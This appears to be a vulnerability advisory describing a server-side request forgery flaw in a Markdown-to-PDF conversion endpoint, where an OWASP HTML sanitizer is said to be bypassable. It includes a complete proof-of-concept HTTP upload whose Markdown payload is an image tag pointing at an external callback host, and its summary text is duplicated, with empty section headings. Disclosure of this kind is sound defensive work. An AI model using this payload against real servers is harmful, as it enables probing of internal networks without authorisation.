When using the /api/v1/convert/markdown/pdf endpoint to convert Markdown to PDF, the backend calls a third-party tool to process it and includes a sanitizer for security sanitization, but there are flaws that can be bypassed, leading to SSRF vulnerabilities.
The backend uses the third-party sanitizer org.owasp.html, but it has flaws that can be bypassed, leading to SSRF vulnerabilities.
POST /api/v1/convert/markdown/pdf HTTP/1.1
Host: 172.25.24.140:8080
Content-Length: 247
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvAfAbBmFpYrQfooK
Accept: */*
Origin: http://172.25.24.140:8080
Referer: http://172.25.24.140:8080/markdown-to-pdf
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=node0dylx4lgdtzxwixmnid86661r1.node0
Connection: close
------WebKitFormBoundaryvAfAbBmFpYrQfooK
Content-Disposition: form-data; name="fileInput"; filename="ssrf.md"
Content-Type: application/octet-stream
<img src='http://e6c4490692.ipv6.bypass.eu.org/'>
------WebKitFormBoundaryvAfAbBmFpYrQfooK--
Here are two articles that introduce the principles and risks of SSRF for your reference.
Summary
When using the /api/v1/convert/markdown/pdf endpoint to convert Markdown to PDF, the backend calls a third-party tool to process it and includes a sanitizer for security sanitization, but there are flaws that can be bypassed, leading to SSRF vulnerabilities.
Details
The backend uses the third-party sanitizer org.owasp.html, but it has flaws that can be bypassed, leading to SSRF vulnerabilities.
source:
stirling/software/SPDF/controller/api/converters/ConvertMarkdownToPdf.java
sink:
stirling/software/SPDF/utils/FileToPdf.java
PoC
Impact
Here are two articles that introduce the principles and risks of SSRF for your reference.